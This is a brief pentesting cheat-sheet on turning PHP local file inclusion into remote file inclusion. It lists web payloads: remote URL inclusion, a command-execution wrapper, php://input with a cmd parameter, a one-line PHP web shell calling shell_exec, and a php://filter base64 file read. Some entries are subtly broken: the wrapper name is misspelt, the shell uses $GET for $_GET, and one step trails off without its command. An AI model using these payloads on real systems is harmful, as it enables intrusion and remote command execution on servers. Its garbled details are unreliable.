Turning LFI into RFI

These are techniques that you can use to turn LFI into RFI

This allows you to access URLS

http://[path-to-remote-file]

Starting a simple python server we can attempt to gain the file as so:

This wrapper allows you to run system commands. Its syntax is:

except://[command]

This allows you to read raw data from the request body, this uses post data

php://input&cmd=[command]

post data syntax

<?php echo shell_exec($GET['cmd']); ?>

This wrapper converts the page into base64 and outputs it

php://filter/convert.base64-encode/resource=[file-name]

Last updated 5 years ago